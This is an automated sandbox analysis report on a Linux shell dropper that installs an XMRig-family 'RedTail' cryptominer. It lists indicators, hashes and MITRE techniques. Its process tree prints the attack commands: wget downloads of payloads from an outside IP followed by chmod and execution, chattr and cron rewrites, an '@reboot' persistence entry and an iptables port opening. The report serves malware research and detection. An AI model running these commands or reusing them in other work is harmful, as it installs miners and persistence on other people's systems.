Analysis
-
max time kernel
150s -
max time network
154s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
24-11-2024 07:02
Static task
static1
Behavioral task
behavioral1
Sample
sh.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
sh.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
sh.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
sh.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
sh.sh
-
Size
1KB
-
MD5
5a86127d998b5c3496802959ac0a3d11
-
SHA1
21d05b5a016cdd8245e24778e479bf6330867c3f
-
SHA256
aed29398112ad074b8fd8a2e25020fb01db1f8cdaff86326222529dbeba5746b
-
SHA512
3270ff6b4bb0dde62180e605a7fc114497df627c8cb5cb4865040e9d287123a4b4855d4e6e386757e9bba0b57f1ef02fb1d81204bfc83612ac87a109962b6e98
Malware Config
Signatures
-
Xmrig family
-
Contacts a large (62386) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
XMRig Miner payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/839-1-0xb6b02000-0xb6e67454-memory.dmp xmrig -
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodpid process 784 chmod 838 chmod -
Executes dropped EXE 1 IoCs
Processes:
.redtailioc pid process /.redtail 839 .redtail -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 95.215.19.53 -
Attempts to change immutable files 24 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
Processes:
shchattrchattrgrepchattrchattrgrepchattrgrepgrepgrepgrepgrepchattriptableschattrchattrchattrchattrchattrchattrgrepchattrchattrpid process 855 sh 790 chattr 801 chattr 802 grep 804 chattr 813 chattr 811 grep 814 chattr 817 grep 791 grep 796 grep 805 grep 808 grep 810 chattr 856 iptables 793 chattr 795 chattr 798 chattr 807 chattr 789 chattr 794 chattr 799 grep 815 chattr 816 chattr -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.NACfta crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads network interface configuration 2 TTPs 6 IoCs
Fetches information about one or more active network interfaces.
Processes:
finddescription ioc process File opened for reading /sys/devices/virtual/net/lo/statistics find File opened for reading /sys/devices/virtual/net/lo/power find File opened for reading /sys/devices/virtual/net/lo/queues find File opened for reading /sys/devices/virtual/net/lo/queues/tx-0 find File opened for reading /sys/devices/virtual/net/lo/queues/tx-0/byte_queue_limits find File opened for reading /sys/devices/virtual/net/lo/queues/rx-0 find -
Processes:
resource yara_rule /arm7 upx -
Changes its process name 1 IoCs
Processes:
.redtaildescription ioc pid process Changes the process name, possibly in an attempt to hide itself systemd 840 .redtail -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
.redtaildescription ioc process File opened for reading /proc/cpuinfo .redtail -
Reads CPU attributes 1 TTPs 27 IoCs
Processes:
.redtailfinddescription ioc process File opened for reading /sys/devices/system/cpu/cpu0/topology/physical_package_id .redtail File opened for reading /sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map .redtail File opened for reading /sys/devices/system/cpu/cpufreq find File opened for reading /sys/devices/system/cpu/cpu0 find File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map .redtail File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map .redtail File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq .redtail File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus .redtail File opened for reading /sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map .redtail File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/base_frequency .redtail File opened for reading /sys/devices/system/cpu/cpu0/topology/thread_siblings .redtail File opened for reading /sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map .redtail File opened for reading /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map .redtail File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map .redtail File opened for reading /sys/devices/system/cpu/power find File opened for reading /sys/devices/system/cpu/online .redtail File opened for reading /sys/devices/system/cpu/cpu0/topology find File opened for reading /sys/devices/system/cpu/cpu0/topology/core_siblings .redtail File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map .redtail File opened for reading /sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map .redtail File opened for reading /sys/devices/system/cpu/cpu0/cpu_capacity .redtail File opened for reading /sys/devices/system/cpu/hotplug find File opened for reading /sys/devices/system/cpu/cpu0/power find File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id .redtail File opened for reading /sys/devices/system/cpu/cpu0/topology/cluster_cpus .redtail File opened for reading /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map .redtail File opened for reading /sys/devices/system/cpu/cpu0/hotplug find -
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
finddescription ioc process File opened for reading /sys/devices/platform/serial8250/tty find File opened for reading /sys/devices/platform/a000400.virtio_mmio find File opened for reading /sys/bus/i2c/drivers/rtc-pcf8563 find File opened for reading /sys/kernel/irq/60 find File opened for reading /sys/kernel/debug/tracing/events/jbd2/jbd2_commit_flushing find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_enter_sched_get_priority_min find File opened for reading /sys/kernel/irq/49 find File opened for reading /sys/kernel/debug/tracing/events/ftrace/kernel_stack find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_enter_sigsuspend find File opened for reading /sys/devices/platform/a001200.virtio_mmio/power find File opened for reading /sys/kernel/debug/tracing/events/regmap/regmap_hw_write_done find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_enter_creat find File opened for reading /sys/kernel/debug/tracing/events/signal/signal_deliver find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_exit_getsid find File opened for reading /sys/kernel/debug/tracing/events/ext4/ext4_sync_file_enter find File opened for reading /sys/kernel/debug/tracing/events/ras/mc_event find File opened for reading /sys/kernel/debug/tracing/events/ipi/ipi_raise find File opened for reading /sys/module/ip_tables/holders find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_exit_pciconfig_read find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_exit_io_destroy find File opened for reading /sys/kernel/debug/tracing/events/irq/softirq_entry find File opened for reading /sys/bus/amba find File opened for reading /sys/fs/cgroup/devices/system.slice/rsyslog.service find File opened for reading /sys/bus/platform/devices find File opened for reading /sys/kernel/debug/tracing/events/writeback/writeback_lazytime find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_exit_fsync find File opened for reading /sys/devices/virtual/graphics find File opened for reading /sys/module/crc16/holders find File opened for reading /sys/kernel/debug/tracing/events/thermal/thermal_zone_trip find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_exit_init_module find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_exit_pipe find File opened for reading /sys/bus/platform/drivers/poweroff-gpio find File opened for reading /sys/bus/platform/drivers/armada-375-usb-cluster find File opened for reading /sys/module/virtio_mmio/notes find File opened for reading /sys/module/crc16/sections find File opened for reading /sys/module/xz_dec find File opened for reading /sys/kernel/debug/tracing/events/rpm find File opened for reading /sys/kernel/debug/tracing/events/cgroup/cgroup_remount find File opened for reading /sys/devices/virtual/misc/psaux/power find File opened for reading /sys/devices/virtual/tty/tty16 find File opened for reading /sys/fs/cgroup/systemd/system.slice/systemd-user-sessions.service find File opened for reading /sys/module/ip_tables find File opened for reading /sys/kernel/debug/tracing/events/iommu/attach_device_to_domain find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_enter_setresuid find File opened for reading /sys/bus/xen/drivers find File opened for reading /sys/kernel/debug/tracing/events/kvm/kvm_age_page find File opened for reading /sys/fs/cgroup/devices/system.slice/keyboard-setup.service find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_exit_setresgid16 find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_enter_syslog find File opened for reading /sys/kernel/debug/tracing/events/skb/skb_copy_datagram_iovec find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_enter_fsetxattr find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_exit_setresuid16 find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_exit_exit_group find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_exit_fstatat64 find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_exit_perf_event_open find File opened for reading /sys/devices/platform/a003e00.virtio_mmio/virtio1 find File opened for reading /sys/bus/platform/drivers/sunxi-rtc find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_enter_mount find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_enter_timer_settime find File opened for reading /sys/kernel/debug/tracing/events/ftrace/funcgraph_entry find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_enter_shmget find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_exit_mkdirat find File opened for reading /sys/kernel/debug/tracing/events/syscalls/sys_enter_sigprocmask find File opened for reading /sys/kernel/debug/tracing/events/kvm/kvm_hvc find -
Processes:
find.redtailsystemctldescription ioc process File opened for reading /proc/147/task/147/net/stat find File opened for reading /proc/286/net/netfilter find File opened for reading /proc/414/cmdline .redtail File opened for reading /proc/5 find File opened for reading /proc/23/task/23/fdinfo find File opened for reading /proc/25/task/25 find File opened for reading /proc/25/map_files find File opened for reading /proc/137/attr find File opened for reading /proc/655/task/657/net/netfilter find File opened for reading /proc/664/task/664/net/stat find File opened for reading /proc/5/task/5/net/dev_snmp6 find File opened for reading /proc/6/net/stat find File opened for reading /proc/22/task/22 find File opened for reading /proc/461/map_files find File opened for reading /proc/649/ns find File opened for reading /proc/1/map_files find File opened for reading /proc/104/net/dev_snmp6 find File opened for reading /proc/664/fdinfo find File opened for reading /proc/302/cmdline .redtail File opened for reading /proc/605/net find File opened for reading /proc/1/net/dev_snmp6 find File opened for reading /proc/9/net/dev_snmp6 find File opened for reading /proc/14/task/14/net/netfilter find File opened for reading /proc/20/task/20/ns find File opened for reading /proc/25/task/25/net/stat find File opened for reading /proc/104/task/104/net/dev_snmp6 find File opened for reading /proc/149/task/149 find File opened for reading /proc/166/net/stat find File opened for reading /proc/cpu find File opened for reading /proc/10/task/10/fdinfo find File opened for reading /proc/24/task/24 find File opened for reading /proc/41/ns find File opened for reading /proc/95/task find File opened for reading /proc/462/task/462/fdinfo find File opened for reading /proc/139/task/139/net/netfilter find File opened for reading /proc/265/task/278 find File opened for reading /proc/265/task/280/fdinfo find File opened for reading /proc/8/task/8 find File opened for reading /proc/11/ns find File opened for reading /proc/18/fdinfo find File opened for reading /proc/27/task find File opened for reading /proc/41/task/41/attr find File opened for reading /proc/648/task/648 find File opened for reading /proc/649/net/dev_snmp6 find File opened for reading /proc/666/net/stat find File opened for reading /proc/filesystems systemctl File opened for reading /proc/265/task/265/attr find File opened for reading /proc/266/task/266/ns find File opened for reading /proc/286/task/286 find File opened for reading /proc/11/task/11/ns find File opened for reading /proc/27/task/27/net/netfilter find File opened for reading /proc/74/task/74/net/stat find File opened for reading /proc/106/fd find File opened for reading /proc/139/net/dev_snmp6 find File opened for reading /proc/649/net/stat find File opened for reading /proc/650/net/netfilter find File opened for reading /proc/666/attr find File opened for reading /proc/11/task/11 find File opened for reading /proc/12/attr find File opened for reading /proc/28/task/28/net/stat find File opened for reading /proc/655/task/656/attr find File opened for reading /proc/25/net find File opened for reading /proc/29/task/29/fdinfo find File opened for reading /proc/414/fd find -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
shdescription ioc process File opened for modification /tmp/clean_crontab sh
Processes
-
/tmp/sh.sh/tmp/sh.sh1⤵PID:651
-
/bin/catcat /proc/mounts2⤵PID:660
-
-
/bin/grepgrep noexec2⤵PID:661
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:662
-
-
/usr/bin/whoamiwhoami2⤵PID:668
-
-
/usr/bin/findfind / -type d -user root -perm "-u=rwx" -not -path "/tmp/*" -not -path "/proc/*" -not -path /sys -not -path "/sys/*" -not -path /proc -not -path "/proc/*" -not -path /dev/pts -not -path "/dev/pts/*" -not -path /run -not -path "/run/*" -not -path /sys/kernel/security -not -path "/sys/kernel/security/*" -not -path /run/lock -not -path "/run/lock/*" -not -path /sys/fs/cgroup -not -path "/sys/fs/cgroup/*" -not -path /sys/fs/cgroup/systemd -not -path "/sys/fs/cgroup/systemd/*" -not -path "/sys/fs/cgroup/net_cls,net_prio" -not -path "/sys/fs/cgroup/net_cls,net_prio/*" -not -path "/sys/fs/cgroup/cpu,cpuacct" -not -path "/sys/fs/cgroup/cpu,cpuacct/*" -not -path /sys/fs/cgroup/freezer -not -path "/sys/fs/cgroup/freezer/*" -not -path /sys/fs/cgroup/perf_event -not -path "/sys/fs/cgroup/perf_event/*" -not -path /sys/fs/cgroup/cpuset -not -path "/sys/fs/cgroup/cpuset/*" -not -path /sys/fs/cgroup/pids -not -path "/sys/fs/cgroup/pids/*" -not -path /sys/fs/cgroup/blkio -not -path "/sys/fs/cgroup/blkio/*" -not -path /sys/fs/cgroup/devices -not -path "/sys/fs/cgroup/devices/*" -not -path /sys/fs/cgroup/memory -not -path "/sys/fs/cgroup/memory/*"2⤵
- Reads network interface configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:671
-
-
/bin/unameuname -mp2⤵PID:777
-
-
/usr/bin/touchtouch .testfile2⤵PID:778
-
-
/bin/dddd "if=/dev/zero" "of=.testfile2" "bs=2M" "count=1"2⤵PID:780
-
-
/bin/rmrm -rf .testfile .testfile22⤵PID:781
-
-
/usr/bin/wgetwget http://45.202.35.190/clean2⤵PID:782
-
-
/bin/chmodchmod +x clean2⤵
- File and Directory Permissions Modification
PID:784
-
-
/bin/shsh clean2⤵
- Writes file to tmp directory
PID:786 -
/bin/systemctlsystemctl disable c3pool_miner3⤵
- Reads runtime system information
PID:787
-
-
/bin/systemctlsystemctl stop c3pool_miner3⤵PID:788
-
-
/usr/bin/chattrchattr -ia /var/spool/cron/crontabs3⤵
- Attempts to change immutable files
PID:789
-
-
/usr/bin/chattrchattr -ia /etc/crontab3⤵
- Attempts to change immutable files
PID:790
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/crontab3⤵
- Attempts to change immutable files
PID:791
-
-
/bin/mvmv /tmp/clean_crontab /etc/crontab3⤵PID:792
-
-
/usr/bin/chattrchattr -ia /etc/cron.hourly3⤵
- Attempts to change immutable files
PID:793
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily3⤵
- Attempts to change immutable files
PID:794
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/apt-compat3⤵
- Attempts to change immutable files
PID:795
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/apt-compat3⤵
- Attempts to change immutable files
PID:796
-
-
/bin/mvmv /tmp/clean_crontab /etc/cron.daily/apt-compat3⤵PID:797
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/bsdmainutils3⤵
- Attempts to change immutable files
PID:798
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/bsdmainutils3⤵
- Attempts to change immutable files
PID:799
-
-
/bin/mvmv /tmp/clean_crontab /etc/cron.daily/bsdmainutils3⤵PID:800
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/dpkg3⤵
- Attempts to change immutable files
PID:801
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/dpkg3⤵
- Attempts to change immutable files
PID:802
-
-
/bin/mvmv /tmp/clean_crontab /etc/cron.daily/dpkg3⤵PID:803
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/exim4-base3⤵
- Attempts to change immutable files
PID:804
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/exim4-base3⤵
- Attempts to change immutable files
PID:805
-
-
/bin/mvmv /tmp/clean_crontab /etc/cron.daily/exim4-base3⤵PID:806
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/logrotate3⤵
- Attempts to change immutable files
PID:807
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/logrotate3⤵
- Attempts to change immutable files
PID:808
-
-
/bin/mvmv /tmp/clean_crontab /etc/cron.daily/logrotate3⤵PID:809
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/passwd3⤵
- Attempts to change immutable files
PID:810
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/passwd3⤵
- Attempts to change immutable files
PID:811
-
-
/bin/mvmv /tmp/clean_crontab /etc/cron.daily/passwd3⤵PID:812
-
-
/usr/bin/chattrchattr -ia /etc/cron.weekly3⤵
- Attempts to change immutable files
PID:813
-
-
/usr/bin/chattrchattr -ia /etc/cron.monthly3⤵
- Attempts to change immutable files
PID:814
-
-
/usr/bin/chattrchattr -ia /etc/cron.d3⤵
- Attempts to change immutable files
PID:815
-
-
/usr/bin/chattrchattr -ia /etc/anacrontab3⤵
- Attempts to change immutable files
PID:816
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/anacrontab3⤵
- Attempts to change immutable files
PID:817
-
-
/bin/mvmv /tmp/clean_crontab /etc/anacrontab3⤵PID:818
-
-
/bin/rmrm -rf /tmp/sh.sh3⤵PID:819
-
-
/bin/rmrm -rf "/var/tmp/*"3⤵PID:820
-
-
/bin/rmrm -rf "/dev/shm/*"3⤵PID:821
-
-
-
/bin/rmrm -rf clean2⤵PID:822
-
-
/bin/rmrm -rf .redtail2⤵PID:823
-
-
/bin/grepgrep -q x86_642⤵PID:825
-
-
/bin/grepgrep -q amd642⤵PID:827
-
-
/bin/grepgrep -q "i[3456]86"2⤵PID:829
-
-
/bin/grepgrep -q armv82⤵PID:831
-
-
/bin/grepgrep -q aarch642⤵PID:833
-
-
/bin/grepgrep -q armv72⤵PID:835
-
-
/usr/bin/wgetwget http://45.202.35.190/arm72⤵PID:836
-
-
/bin/mvmv arm7 .redtail2⤵PID:837
-
-
/bin/chmodchmod +x .redtail2⤵
- File and Directory Permissions Modification
PID:838
-
-
/.redtail./.redtail2⤵
- Executes dropped EXE
- Changes its process name
- Checks CPU configuration
- Reads CPU attributes
- Reads runtime system information
PID:839 -
/bin/shsh -c "command -v crontab >/dev/null 2>&1"3⤵PID:841
-
-
/bin/shsh -c "crontab -r >/dev/null 2>&1; echo \"@reboot /.redtail\" | crontab -"3⤵PID:842
-
/usr/bin/crontabcrontab -r4⤵PID:843
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:845
-
-
-
/bin/shsh -c "command -v php >/dev/null 2>&1"3⤵PID:846
-
-
/bin/shsh -c "command -v nginx >/dev/null 2>&1"3⤵PID:847
-
-
/bin/shsh -c "which apache2"3⤵PID:848
-
/usr/bin/whichwhich apache24⤵PID:849
-
-
-
/bin/shsh -c "which httpd"3⤵PID:850
-
/usr/bin/whichwhich httpd4⤵PID:851
-
-
-
/bin/shsh -c "iptables -I INPUT -p tcp --dport 58919 -j ACCEPT >/dev/null 2>&1"3⤵
- Attempts to change immutable files
PID:855 -
/sbin/iptablesiptables -I INPUT -p tcp --dport 58919 -j ACCEPT4⤵
- Attempts to change immutable files
PID:856
-
-
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD5b2d1236c286a3c0704224fe4105eca49
SHA17d76d48d64d7ac5411d714a4bb83f37e3e5b8df6
SHA2565647f05ec18958947d32874eeb788fa396a05d0bab7c1b71f112ceb7e9b31eee
SHA512731859029215873fdac1c9f2f8bd25a334abf0f3a9e1b057cf2cacc2826d86b0c26a3fa920a936421401c0471f38857cb53ba905489ea46b185209fdff65b3b6
-
Filesize
1.1MB
MD5045daa66263bfd467051c013e9222faf
SHA14b943b14526d7bf7be2b3e3f9af24d1f35015548
SHA256d4635f0f5ab84af5e5194453dbf60eaebf6ec47d3675cb5044e5746fb48bd4b4
SHA512bd684e0909793c05a34891f2ffe289e00b66c634d8059a9301274ef764aff38ae6d5c0c224228d11007b297e32e00749b40197f77f7fc48c44c50ef3651bc41f
-
Filesize
795B
MD5397ff5e54194072e6d8a44a0d8cc1b27
SHA142477b0c3b277b5e907b0a35c644f3291ed30a63
SHA256d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e
SHA512ff40c129e3b2891ae280bce97e52ee69aea18ca60ea7901f7efd4cf11d3bf1c4ee48e9eb90e5f045e080ab784ee2a9942c2bcf0a531b7f4602931f63c4b32d74
-
Filesize
1KB
MD530e858769aacd9cc309502f8d5c6aa0f
SHA1927c06dd4d6cbb5ca02e9505011c8667c47f2d6e
SHA256eff406c0943e1399e3e15fdb6ca2893a187d6b273f5bd9d17eec4e4b4c52b8cd
SHA512f7f6e70925afe54fc2fdaae13a750b3c49fde9fa59d80af321885d270112ebb2291f034037708f1ba8515f3e3e1ca0a493cd1e002895aa699c469e0365ccde3c
-
Filesize
3KB
MD502f33c9e59b27bcd241e488cd48de072
SHA19247eee9b2310d56455beccf41c577ba16b78e3d
SHA2562565ab0cb86a8cb7fd37a0401ad22624da886b8df9130a5bd4b566f404130c14
SHA5121eda274264320a72cd58462b6c8a7747990a7eedf836be730b51b92ea6b04a1005aed596f9b9d53c4c8a93001d112450d0c6d83dfe4eee4b91a671623662fb3d
-
Filesize
249B
MD5db990990933b6f56322725223f13c2bc
SHA1387303696a796e27f559c73679e979f2a538072d
SHA256777a9112ee093d8683645b031eb6cfeb9ce77274f40575c48ff2054ea24114d1
SHA512a3764e580bcfe0b2100da8ff2a00bed4936cb2acc9985daef52fb0310a7ed3367a1944a355c3f1dbc92d82c82b54280926736f81bc138efb4f7df1814abee3b5
-
Filesize
722B
MD58f111d100ea459f68d333d63a8ef2205
SHA1077ca9c46a964de67c0f7765745d5c6f9e2065c3
SHA2560e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354
SHA512d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb
-
Filesize
1KB
MD5bc4a71cbcaeed4179f25d798257fa980
SHA161445721d0b5d86ac0a8386a4ceef450118f4fbb
SHA2568eeae3a9df22621d51062e4dadfc5c63b49732b38a37b5d4e52c99c2237e5767
SHA512709badb4dd1a15a10b34f82d31ed4bbab81698190d2ec94e2ad3dcdc90d97b893eb61cde72f08e517a8beea08ec1d675385fd42a9e77530981b7d83c6bd3548c
-
Filesize
279B
MD5911a774fe040993b929504f3d9415ab3
SHA155ccc8e95097f005abf9f4d91a14394e6d0f5da5
SHA256340dfc483eb79b83b0630b1c0b339e30ebd724ef2f58bb87ba92946472e8e63d
SHA5121eb8fd8dc6fd444ba2fa3ca7e863894cfb19383e5b20c700ed24aa615402340424d093a761632cf27a3e789ecd548ca972806e154161635da4f97b415d6fc64f
-
Filesize
193B
MD5fe38347169e810d2a1ed3112a21286a7
SHA1cf61d0808c9c57799a814924d7beca28f09014c1
SHA2565c5b16fa7fa24f51c56d30c4e08f1513bbf9512ef62ffec09a8bcb04314b78c2
SHA512eb893eb6d7cd1aab15ec3d0055c7eeb308e9f4eae7cd755c1f531669a23ca8f44c2d57ed31a69af1173595ea02b3370e49b084c748b772815a08d17ef361b611